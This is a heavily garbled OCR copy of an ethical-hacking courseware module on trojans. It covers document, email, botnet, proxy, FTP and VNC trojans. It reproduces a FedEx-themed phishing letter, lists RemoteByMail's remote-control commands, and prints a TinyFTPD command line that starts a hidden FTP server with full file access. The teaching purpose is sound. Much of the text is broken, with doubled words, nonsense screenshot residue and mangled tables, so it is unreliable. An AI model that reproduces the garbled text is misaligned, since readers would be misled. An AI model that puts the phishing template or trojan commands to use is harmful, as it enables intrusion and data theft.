Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on is Strictly Stri ctly Prohibited. Prohibi ted.
GU I Trojan: Trojan: Ju m pe r an d Biodo Bio dox x Jumper Jum per is a malicious malware mal ware program program that performs many functions to download malicious malware from the Internet. Attackers use this jumper Trojan to get sensitive data like financial information from the user's system. It also downloads additional downloads for the attacker to be able to access the system remotely. Generally, the BIODOX OE Edition.exe file should be in the C:\Windows\System32 folder; if it has been found elsewhere, then it is a Trojan. Once the computer gets infected by the Biodox, the system performance decreases. The screensaver gets changed automatically. Continuous annoying advertisement pop-ups appearing on the computer can be treated as one of the symptoms of this Trojan.
Module 06 Page 872
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
ftodox Open Source t *ID 0 4 432 soc 544 li-Jcsss-eie 552 m y* r ■■ MO 628 MO 648 J 'r e . S36 U svO w s teJie w e 1 |*•.cfcott tx t 992 UtI svetwst n r 1016 3r.cN>st ext 244 296 SjUtoc*. _Jr.ch0it tx t 360 L-J [system pr. D umm
,
Status -weerufuly
System Sy»tem System System System System System System System System System System System System System System System
" "0 V 0 0 929792 5*01632 7430144 4t496*« 6287360 7188480 10*21*32 4612800 641*432 7192576 9965568 7016448 33181696 12562432 12091392
»
,
. 1
a
• Non* Normal Norm*
Normal Norm■ Norm* S0rr\» Norma( Norm* Norm* Norm■ Norm■ Normal
M
Clear Applicator Lh t
FIGURE 6.13: Screenshots showing Biodox and Jumper
Module 06 Page 873
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
D ocum ent Trojans VIA LETTER John John Stev Stevens Royal Communications Company 445 152thStree hStreett S.W. Washington Washington,, DC 20554
FecEx September 2, 2012
CEH CEH !B e !
Attacker
RE: Fedex Shipment Airwa Ai rway y Bill Number: 867676340056 Dear Mr. Stevens St evens: We have have received recei ved a packageaddressed to you at the value val ue of USD 2,300. The custom duty has not been paid for this t his shipment which is listed li sted as Apple iMac 24 Computer. Please Please call us at Fedex at 1800-234-446 Ext 345 or e-mail me at [email protected] regarding this shipment. Please visit visi t our Fedex Package TrackingWebsite Websit e to see more details about this shipment and advice us on howto proceed. The website websit e link is attached with this letter.
Attacker embeds Trojan into a Word document and infects victim computer
Victim's Package
Trojan embedded in Word document document
Sincerely, MichelleRoberts CustomerService Ser vice Representative Internatio International nal Shipment and Handling Fedex Atlanta Division Tel: Tel: 1800-234-446 Ext 345 http://www.fedex.com [email protected]
System
Trojan is executed as victim opens the document and clicks on Trojan package
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on is Strictly Stri ctly Prohibited. Prohibi ted.
D o c u m e n t T r o j an an s Most users usually have the tendency to update their operating system but not the application they use regularly. Attackers take this opportunity to install document Trojans. Attackers usually embed a Trojan into a document and transfer it in the form of an attachment in emails, office documents, web pages, or media files such as flash and PDFs. When a user opens the document with the embedded Trojan assuming it is a legitimate one, the Trojan is installed on the victim's machine. This exploits the application used to open the document. Attackers can then access sensitive data and perform malicious actions.
Module 06 Page 874
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
Attacker
m Attac ker embeds Trojan into a Word document and infects victim computer
® !!!
s
m Trojan is executed executed as victim opens the document and clicks on Trojan Trojan package FIGURE 6.13: Attacker infecting victim's machine using Document Trojan
An example of a Trojan embedded in a Word document is as follows: VIA LETTER John Stevens Stevens R^alC^muniraUonsCompany R^alC^muniraUonsCompany 445 152thStreet 152thStreet S.W . Washington, DC 20554
FecEx Septem ber 2, 2012 r
RE: Fedex Shipment Airway Bill Number: 867676340056 Dear Mr. Stevens: W e have recei ved a package addressed addressed to you at the value of USD 2,300. The custom duty has not been paid for this shipment which is listed as Apple iMac24' Computer. Please call us at Fedex at 1800 1800-2 -234-446 34-446Fxt 3450r e-mail e-mail me at m.robcrts(S>fed m.robcrts(S>fedex.com ex.com regarding this shipment. Please visit our Fedex Package Tracking Tracking webs ite t o see more details about this shipment and advice us on howto proceed. The website link is attached attached w ith this letter.
'•--* PackaQe
Trojan embed em bed ded in W ord document
Sincerely, Michelle Roberts Roberts Customer Service Representative International Shipment and Handling Fedex Atlanta Division Tel: 1800-234-446 1800-234-446 Ext Ext 345 http://www.fedex.com m.rohertsgOfpdex.com
Module 06 Page 875
Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
FIGURE 6.14: An example of Trojan embedded in a Word document
E-m ail Troj Troj an anss
CEH
J
Attacker gains gains remote control control of a victim victim computer computer by by send sending ing email email messa messages ges
J
Attacke Attackers rs can can then then retri eve files files or folders by sendin sending g command commands s throu through gh email email
J
Attacker Attacker uses uses open open relay SMTP server server and and fakes fakes the email's email's FROM field field to hide hide origin
Instructions are sent to the victim through emails emails
/ \
- \ 7
Any commands commands for me?
Send me :\creditcard.txt file and launch calc.exe
Here is the requested file
mt
Email
Attacker
' ( m y
Calc.exe executed
Internet
Firewall
Victim
Copyright G by EG-GtlMCil. All Rights Reserved. Reproduction is Strictly Strictl y Prohibited.
Email Trojans spread through bulk emails. Trojan viruses are sent through attachments. The moment the user opens the email, the virus enters the system and spreads and causes a lot of damage to the data in the system. It is always recommended that users not open emails from unknown users. Sometimes email Trojans may even generate automatic mail and send send it to all the contacts co ntacts present pr esent in the vic tim's tim 's address addr ess book. Thus, Thus, it is is spread through the contact list of the infected victim. Attackers send instructions to the victim through email. When the victim opens the email, the instructions will be executed automatically. Thus, attackers can retrieve files or folders by sending commands through email. The following figure explains how an attack can be performed using email Trojans.
Module 06 Page 876
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
Instructions Instructions ar• sent to the victim through emails
Any commands for me?
\aradi tcard. tcard. txt Send me : \aradi file and launch calc.exe
Here is the requested file
J p ?
Email
j !
; Cdk.exe j ex ec ut ed
I
*
* y rl• Attacker
Internet
Firewall
Victim
FIGURE 6.15: Illustrating the attack process using email Trojans
Module 06 Page 877
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
E-m ail Troja Tro jans ns:: Rem oteBy M ail
C EH
C«dseMecUed 0 Ertvai: :«nr
0
Next eavjrf check 000900 Nov* ctociung
POP patswad
lastitspow
SMT P Mfv«r
$t«t• No co«*tt ton
Avaijfatewrnnand
10/tjeAaoxn Aulherticaton| Aulherticaton| Sanew anew POP
lo .« .«eaa eaa
j]
SMTPuter
Piogrmt
SMTP pa«wad p*t*
SoltPwf e (»c«pod*0t c«pod*0t olip#<* • canl
r
----
__
......
uMnVo**[*•*•**00
•><»s»np»ecQn»
d*
m>w
»•
_____ » y uteri mai»* «* 0!.
•
6
_
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on is Strictly Stri ctly Prohibited. Prohibi ted.
Em Trojans : ARemoteBy Mail A I I Uail A A Trojans: A A \ S JV & A L 1 9 ■ V V I I I V / I V A / Jf A f ia ii U RemoteByMail is used to control and access a computer, irrespective of its location, simply by sending email. With simple commands sent by email to a computer at work or at home, it can perform the following tasks: 0
Retrieves Retrie ves list list of files and folders folder s easily
0
Zips Zips files automati auto matically cally that are to be transferred transfe rred
0
Helps to execute programs, programs, batch files, or opens files
This is is an easier way to access files or to execute programs on a computer comp uter remotely. remot ely. The main screen displays information that the program has received and processed: 0
Start Server: Ser ver: Click Click the Start Server icon icon for RemoteB yMail to begin the process process and and receive email email
0
Stop: Click the Stop icon to stop stop the application applicat ion at any time
0
Check now: Checks Checks for next scheduled email
0
Statistics: Statis tics: Displays program information informatio n
0
Listening to Accounts: Accou nts: Displays Displays accounts and associated email addresses
Module 06 Page 878
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
0
Emails received rece ived:: Displays Displays email list list containing commands the program program has has received receiv ed
0
Command Comman d queue: Displays commands the program has has received receive d but not yet processed
0
Outgoing emails: Checks Checks for processing processing email
0
Emails send: send: Displays Displays list of email sent by Remo Re moteB teByMa yMail il
RemoteByMail accepts and executes the following commands: 0
HI: Used Used to send email with the content "Hi" to your email address
0
SEND: Sends files located on the host computer comp uter to your email address
0
ZEND: Zips Zips and and then sends sends files files or folders located on the host computer comp uter to your email address. To open a Zip attachme atta chment nt after afte r you receive, en ter the password you chose when you created the account
0
EXECUTE: EXECU TE: Executes programs or batch files on the host's computer comp uter
0
DIR: Sends Sends the directory directo ry of a drive or folder fold er to your email address
N» Accor• Too•
©
^ 0.0
Ujf>
D*•
ficm
C#•
>o>
3 Cm* imo M 0 E«m* mr* 0 Nerf«ooicr«d »C9CC Hw c.'Kirg rg
9w
POPtm!■ wig SMTPMfv PMfvw
IwHp IwHpwh whcq cqnn
SMTP *
A»
LMWtr Om
To
•
I
SMTP9$mm* SMTP9$mm*
C1«MaM*ct«gM ifim
J
{*oJ&tyaMttCi•'*•*
itft
• nv.'/.'xn w n /sm r m
**« :fw' fw 'tng mk«I r
, v««
f*.0 * u+nnt* (,*mac**
✓0* ✓0* I
Xi w !
7 b* |
FIGURE 6.16: RemoteByMail screenshots
Module 06 Page 879
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
D e f a c e m e n t T ro roj a n s
CEH
Defa cem ent Troj Trojan anss Defacement Trojans, once spread over the system, can destroy or change the entire content present in the database. This defacement Trojan is more dangerous when attackers target websites; they physically change the entire HTML format, resulting in the changes of content of the website, and even more loss occurs when this defacement targets e-business activities. It allows you to view and edit almost any aspect of a compiled Windows program, from the menus to the dialog boxes to the icons and beyond. Resource editors allow you to view, edit, extract, and replace strings, bitmaps, logos, and icons from any Windows program. They apply target-styled Custom Applications (UCAs) to deface Windows applications. Example of calc.exe defaced:
Module 06 Page 880
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
You Are Hacked! I !!!
View
Help ~~0.
Defaced calc.exe
E Calculat Calculator or
1 |6acfctfrace| |
YouAieHeckedtlll! View heto
I
I b k * 1m < « | i
0
q
it
ce
z ip
0
■ 7]
^ 1 i i ; . [ >]
CE
|[ ~ C
0
c
0 1 E
IZ]
jn -j
0 0
0 0 0
0
FIGURE 6.16: An example of calc.exe defaced
Module 06 Page 881
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
Defacement Trojans: Restorator Source: http://www.bome.com Restorator is a versatile skin editor for any Win32 programs. The tool can modify the target interface of any Windows 32-bit program and thus create target-styled Custom Applications (UCAs). You can view, extract, add, remove, and change images, icons, text, dialogs, sounds, videos, version, dialogs, and menus in almost all programs. Technically speaking, it allows you to edit the resources in many file types, for example .ocx (Active X), .scr (Screen Saver), and others. The attacker can distribute modifications in a small, self-executing file. It is a standalone program that redoes the modifications made to a program. Its Grab function allows you to retrieve resources from files on a target's disk. Restorator is the Borne flagship product that allows you to do resource (resources are application-dependent data that the respective programmer includes in the program) editing. It is a utility for editing Windows resources in applications and their components, e.g., files with .exe, .dll, .res, .rc, and .dcr extensions. You can use this for translation/localization, customization, design improvement, and development. This resource editor comes with an intuitive target-interface. You can replace logos and can control resource files in the software development process. It can intrude into the target's system and its working programs.
Module 06 Page 882
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
storator 2007 Trial -C:\Software\Softpedia.exe File
Resources
Viewer
Edit
Tools
Help
a - a a o o ,
Res Viewer
H
B
*
•3•
1
Resouice Tree a ]§) Softpe Softpedia dia.ex .exe e S Strin String g S O Q IS
mmmm Saving Delphi/C++ Builder Forms
2 Neutr< tr< R CD CDat a □ 11111 I co con □ MAIN MAINI
Q 1C) Version
□ 1 B t j Manife ifest
1 □ 1
Codepage Shell Integration Viewer Text Editor File Browser RC Files Advanced
1*1 Sho w T ooKips [default] 0 Allow multiple ultiple Restorator instances 0 Show splash screen on start Keep Restorator Window always on top 0 Ask for Folder, when assigning/extracting ing/extracting all [default] [default] Number of recently used files in file menu:
10 ^
Number 01recent 01re cently ly found files in file menu:
20
2> 0K 19 20 21 22 23
String\4089\Neutral
654 26 654 27 27 654 28 654 29 654 30
In t e g e r o v e r f l o w I nv nv al al id id f lo lo at at in in g p oi oi nt nt o pe pe ra ra ti ti on on F lo lo at at in in g p o in in t di di vi vi si si on on by by z er ero F l o a t i ng ng po po in t ov ov e r f l o w F lo lo at at in in a p o in in t u n de de rf rf l ow ow
String
1 open file file
FIGURE 6.17: 6.17: Restorator Screenshot
Module 06 Page 883
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
B o t n et et T r o j a n s 0
CEH
J
Botnet Troj Trojan ans s infect infect a large large numbe numberr of compute computers rs acro across ss a larg large e geogr geograp aphic hical al area to create a network of bots that is controlled through a Command and Control (C&C) center
J
Botnet is used used to launch launch various various attacks attacks on on a victim victim includ including ing denia denial-o l-off-se servi rvice ce attacks, spamming, click fraud, and the theft of financial information
,0
0
0 .
Website
Botnet Server Copyright © by EG-GlDDCil. All Rights Reserved. Reproduction Reproducti on is Strictly Strictl y Prohibited.
Cl
Botnet Botne t Tro jans
soft ware re robots r obots (worms, (wo rms, Trojan horses, horses, and and backdoors) --- A botnet is a collection of softwa that run automatically. It refers to a collection of compromised machines running programs under a common command and control infrastructure. A botnet's originator (attacker) can control the group remotely. These are computers (a group of zombie computers) infected by worms or Trojans and taken over surreptitiously by attackers and brought into networks to send spam, more viruses, or launch denial of service attacks. This is a computer that has been infected and taken over by an attacker by using a virus/Trojan/malware. Botnet owners usually target educational, government, military, and other networks. With the help of botnets, attacks like denial of service, creation or misuse of SMTP mails, click fraud, theft of application serial numbers, login IDs, credit card numbers, etc. are performed.
Module 06 Page 884
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Exam 312-50 Certified Ethical Hacker
Ethical Hacking and Countermeasures Trojans and Backdoors
Botnet C&C C& C Server Serve r FIGURE 6.18: Illustrating the process of infecting company's website using Botnet Trojans
It has two main components: 0
Botnet
0
Botmaster
They target both businesses as well as individual systems to steal valuable information. There are four botnet b otnet topologies. topologies. 0
Hierarchal
0
Multi Server
0
Star
0
Random (Mesh) (Mes h)
Module 06 Page 885
Ethical Hacking and Countermeasures Copyright © by EC-COUIICil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
Botnet Troja Trojan: n: Illu sio n Bot and NetBot Attacker
Reload
pdM dM* creMBOTBNOTirO1
11Ho•* ’( U 01
Pat
2 j j
f\*
ho* ho* 1aaa1
6567 6667
Char ttctvsn P*»: *e *
Chan #ch*n
IJHotf
21
Po»t
Dd«J mnxn
4
Safci .pat
R
* Sock:5oat
R
HP. PC*
R
Random tanpe
2001
Bindttwi. port
RCAo c i m
ixccvcro
MD5 C«ypt
* * ° OP* W a r IRC IRC charrel charrel ,/ |Rr ,
CdrcMicc
* — ! . *. ■*, 1 “ •MW
OyMJSXP SP2 FbtdVduw
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on Is Strictly Stri ctly Prohibited. Prohibi ted.
Botnet Trojan: Illusio n Bot an d NetBot A ttack er Illusion Bot is a clear GUI tool for configuration. When this bot starts, it checks the OS version and if it detects Win98, it calls the Register Service Process API to hide the process from the Task Manager. The bot then proceeds to install the rootkit component. If the installation fails, the bot tries to inject its code inside the explorer.exe process. Illusion Bot is a GUI tool. Features: 0
C&C can be managed over ove r IRC IRC and HTTP HTTP
0
Proxy functionali functi onality ty (Socks4, (Socks4, Socks5) Socks5)
0
FTP service servi ce
0
MD5 support for passwords
0
Rootkit
0
Code injection
0
Colored IRC messages
0
XP SP2 Firewall bypas bypass s
0
DDOS capabilities capabili ties
Module 06 Page 886
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
NetBot Attacker provides a simple Windows Ul for controlling a botnet, reporting and managing the network, networ k, and and commanding attacks. It installs in to the systemin systemin a very ve ry simple simpl e way wa y such as RAR file with two tw o pieces: an INI INI file (see the following, partially editedan editedand d obscured) and a simple EXE. EXE. The original NetBo Net Bott Attack er is is a backdoor; thistool thistool retainsthat retainsthat capability capabi lity and lets you update the bot and and be a part of the rest of the botnet.
9 Br^ry
C \Doajmem and 5«tngs \Wmu»' Pa«5c^ cio/ABOT6INARY E>t —
Retoad
IRCAdnrabtfion
1 01>Jme hosts flltac* Atea Collective order Ute 11
1| Hot* 10 10001
Poll 66 6667
Chan BeHsn
Pats 4*$r
21 Horf 10001
P o ll 6667
Chon Uchan
Pa w
WE B A<*nrct140n 1| Most
Port
Paih
21 Host
Port
Path
F e lt e s hlf w
i sec
r * * j » mmc « Socfc*4. pot♦
R
* $ock»5. pott
R
FTP 00<
R
« Random larnj?
2001
■ 3000 R
Bndshel port
IRC Acc* 1 t BOT PASSWORD O0km *•t et*N et *N D1»v#t * lot *•t S*v#
*•*•n ipgn'if
+ C ot oc dR C nreuages
MDSDypt
<**ny
+ A140 0P admn onlRC ehannri
* IRC tmvH tmvH
+ Irp ct cod• |rfdnvat rfdnvat fWc|
* Bypat tXPSP2F«**al FbodV^jat
« Add to autoload Ext
|
Sava
paiwwtd
About
FIGURE 6.18: Illusion Bot and NetBot Attacker Screenshots
Module 06 Page 887
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
P r ox ox y S e r v e r T r o j a n s Proxy Trojan
,an
W
Trojan Proxy is usually a standalone application that allows remote attackers attackers to use the victim's victi m's computer as . a proxy to connect to the Internet
Hidden Server
Proxy server Trojan, when infected, starts a hidden proxy server on the victim's computer
Infection
Thousands Thousands of machines on the Internet In ternet are infected with proxy servers using this technique
| p •aS © 1®'i Attacker
Victim (Proxied)
Process
Target company
Internet
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on is Strictly Stri ctly Prohibited. Prohibi ted.
Proxy Server Trojans A proxy server Trojan is a type of Trojan that customizes the target's system to act as a proxy server. A proxy server Trojan, when infected, starts a hidden proxy server on the victim's computer. The attacker can use this to carry out any illegal activities such as credit card fraud, identity theft, and can even launch malicious attacks against other networks. This can communicate to other proxy servers and can also send an email that contains the related information.
4 ! P Attacker
■ Victim (Proxied)
Internet Inter net
Target Company
FIGURE 6.19: Attacker infecting Target company's system using Proxy Server Trojans Trojans
Module 06 Page 888
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
Proxy Server Serv er Trojan: Trojan: W3bPrOxy Tr0j4nCr Tr0j4nCr34t0 34t0rr (Funny N am e)
J
W3bPr0xy Tr0j Tr0j4n 4n is is a proxy proxy server se rver Trojan which support multi connection from many clients and report IP and ports to mail of the Trojan owner
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on isStrictly Stri ctly Prohibited.
Proxy Server T rojan: W3bPrO xy Tr0j4nCr34t0r Tr0j4nCr34 t0r (Funny Name) W3bPrOxy Tr0j4nCr34t0r is a proxy server Trojan developed in order to access systems remotely. It supports multi-connections from many clients and reports IP and ports to the email of the Trojan owner.
Module 06 Page 889
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
Listening Ports [Separate [Separ ate ports ports with a slmicolon(;)] (; )] 10;Zl;Z2;80;81;135;l36;«lM12;666;H33;1434;2012|
ZHTectm
%[Mndows system]
few f V o S f • We kom c to W3bPr0xy TrOHn Cr34IOr Cr34IOr V . 1 . D
FIGURE 6.20: W3bPrOxy Tr0j4nCr34t0r detecting IP address
Module 06 Page 890
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
FTP FTP Trojans Tro jans
CEH
Send me \ c r e d i tc tc a r d . t x t f ilile
(FTP Server installed in the the background)
Here is the requested file
Victim
06/02/2012 09/06/2012 08/24/2012 05/21/2012 05/21/2012 06/04/2012 08/11/2012
1,024 rod 0 abc.tzt <0IR> AdventHet 0 AUTOEXEC .BAT 0 COBFIG.SYS <0Ht> Data <0IR> Documents
FTP Trojan: TinyFTPD FTP Trojans install an FTP server on the victim's machine,
£53 Comm and Pro mpt C : \ D o c w e n t s a n d S e t t i n gs gs \ A t M 1 n\Desktop\TinyFTPD 21 55555 test test c:\ win98 all RHLCD
which opens FTP ports
Tiny FTPD VI. 4 By WinKggDrop
An attacker can then connect to the victim's machine using
Bi nd Po rt : Us er Na ae :
FTP port to download any files that exist on the victim's computer
FTP Server Is Started ControlPort: 21 55 555 t es t
P as sw ord:
t es t
BaaeDir:
c:\win96 all
Al lo vd IP: L o ca ca l A d dr dr es es s: s:
1 92 92 . 16 16 8. 8. 1 68 68 . 16 16
R e a dA c ce ss :
Yes
Wn te Ac c es s: LIstAccess:
Ye s Ye s
CreateAccess: D e le le t eA eA cc cc es es s: s: E xe xe cu cu te te Ac Ac ce ce ss ss : UklodcAcoess: Ano nya ous Acc ess
Ye s Y es es Y es es No No
Check Tise Oat Thread Created Successfully *************** 0 C o n n ec ec t i o n Is Is I n Us Us e
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
FTP Trojan s An FTP Trojan is a type of Trojan that is designed to open port 21 and make the target's system accessible to the attacker. It Installs an FTP server on the target's machine, allowing the attacker to gain access to sensitive data and download/upload files/programs through the FTP Protocol. Further, it also installs malware on the targets system. Credit card information, confidential data, email addresses, and password attacks can also be employed where only the attacker gains access to the system. FTP Server
Send me c : \ c r e d i t c a r d . t x t fi f i le
(ft
95V*• Hacker
(FTP Server installed in the background)
Here is the requested f ile
Victim
V u l u nc nc I n d r i v e C h a s n o l a b e l . V o1 u n e S e r i a l N u n b e r i s D 45 45 E -9 -9 FR FR E D i r e c t o r y o f C : \ 06/02/2012 1,024 -rnd 09/06/2012 0 abc.txt 08/24/2012 AdventNet
05 /21 /20 12 0 AUTO AUTOEXE EXEC.B C.BAT AT 0 5 /2 1 /2 0 1 2 0 C ONFIG.SYS 06/04/2012 Data 08/11/2012 Documents and
FIGURE 6.21: Attacker infecting victim's system using FTP Trojans
Module 06 Page 891
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
FTP Trojan: TinyFTPD
Command Prompt C: \ Document ent s and Set Set t i ngs\ ngs\ Admi n\ Deskt op\ op\ Ti nyFTPD nyFTPD 21 5555 55555 5 t est t est c: \ wi n98 al al l RWLCD Ti ny FTPD FTPD VI . 4 By By Wi nEgg nEggD Dr op FTP FTP Server Server I s St St art ed Cont r ol Por t : 21 Bi ndPo ndPorr t : 55555 User Name: t est Passw Password: t est Hom eDi r : c: \ wi n98 n98 Al l owd I P: al l Local Addr ddr ess: 192. 192. 168. 168. 168. 16 ReadAccess: Yes Wr i t eAccess: Yes Yes LI st Access: ccess: Yes Yes Cr eat eAcces eAcces s: Yes Yes Del eteAccess: eteAccess: Yes Yes Execut eAcces eAcces s: Yes Yes Unl ockAccess: ockAcces s: No AnonymousAcc ous Acces ess s : No Check heck Ti me Out Thr ead Cr eated Successf Successf ul l y ******** ****** * wai t i ng For For New New Connec nnectt i on 0 Conne onnect ct i on I s I n Use
FIGURE 6.22: TinyFTPD Screenshot
Module 06 Page 892
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
CEH CEH
VNC Trojan Tro janss VNC Trojan starts a VNC Server daemon in the infected system
It connects to the victim using any VNC viewer with the password "secret
i
Since VNC program is considered a utility, this Trojan will never be detected by anti virus
Command and control instruction
f Attacker
t
Victim
VNC Server
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on isStrictly Stri ctly Prohibited.
VNC VNC Trojan s VNC Trojans allow attackers to use the target's computer as a VNC server. These Trojans won't be detected by antiviruses after they are run, because VNC Server is considered a utility. Performs the following functions when it infects the system: 0
Starts VNC Server Ser ver daemon in the background when infected
0
Connects Connects to the target using using any VNC view er with the the password "secret "
Command and control Instruction
VNC Traffic
Attacker
Victim
VNC Server
FIGURE 6.23: Attacker uses victim's computer as VNC server using VNC Trojans
Module 06 Page 893
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
VNC Trojans: WinVNC and VNC Stealer E M
Incoming Connections
Itk.ul IUcIm
®
OK
f? Accept Socket Connecti Connections ons Display Number [~
imttiM
VNC Stealer
WinVNC W in in VN VN C: C: C ur ur re re nt nt U se se r P rro o pe pe rt rt ie ie s
- _ |
I? Auto
OS
Cancel Apply
Password:
r* Accept CORBA Connect.':.'! r
Disable Remote Keyboard & Pointer Pointer
r
Disable Disable Local Keybo Keyboard ard & Porte*
Ftp•Settings •Settings Host:
Update Handing Pol Consoie Windows Only Only
l~ Poll Ful Screen Screen f? Pol Fore Foregr grou ound ndWindow Window F
T
^
Pol Wrtdow Wrtdow Unde Underr Cuso Cusorr
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
VNC VNC Trojan s: WinVNC an d VNC VNC Stealer WinVNC and VNC Stealer are two VNC Trojans.
WinVNC WinVNC is used for a remote view or to control a Windows machine so this becomes a threat as attackers are able to inject a Trojan into the system and then they are able to access the target's system remotely.
VNC Stealer VNC Stealer is a Trojan written in Visual Basic. VNC.EXE has been used to perform the following behavior: Q The process is packed and/or encryp enc rypted ted using a softwa sof tware re packing process Q
Creates system tray pop-up pop-ups, s, messages messages,, errors, and and security warnings
Q Adds products to the system system registry 9
Writes Wri tes to another Process's Process's Virtual Memo ry (process (process hijackin hijacking) g)
9
Executes Execut es a process
0
Creates new folders on on the system
Module 06 Page 894
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
9
This This process deletes delete s other processes from a disk disk
9
The process hooks code into all all running processes, processes, which could allow it to take control of the system or record keyboard input, mouse activity, and screen contents Registers a Dynamic Link Library File
WinVNC
VNC Stealer
WinVNC: Current User Properties Incoming Connections
OK
!7 Accept Socket Socket Conne Connections ctions Cancel
Display Number: [~
Apply
Password: P Accept Accept C0R8A C0R8A Conne Connector!: ctor!:
r~
Disable Remo» Remo»e Keyboard I Pointer
T Disable Local Keyboard Keyboard i Ponte* Update Handkng Handkng r
Pol Pol Ful Ful Screen creen
(7 Pol Foreg oregro roun und d Window 1“
n
Pol Console Windows Only
T
R^ Cw JOr t v
Pd Wn do w Under nder Cusor
FIGURE 6.23: 6.23: Screenshots showing WinVNC and VNC Stealer
Module 06 Page 895
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
H T T P /H /H T T P S T r o j a n s
CEH
The child program appears to be a user to the firewall so it is allowed to access
Spawn
HTTP Trojans can bypass any firewall and work in the reverse way of a straight HTTP tunnel
W /
the Internet They are executed on the
internal host and spawn a child at a
predetermined time
^
HTTP request to download a file
Trojan passes through
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on Is Strictly Stri ctly Prohibited. Prohibi ted.
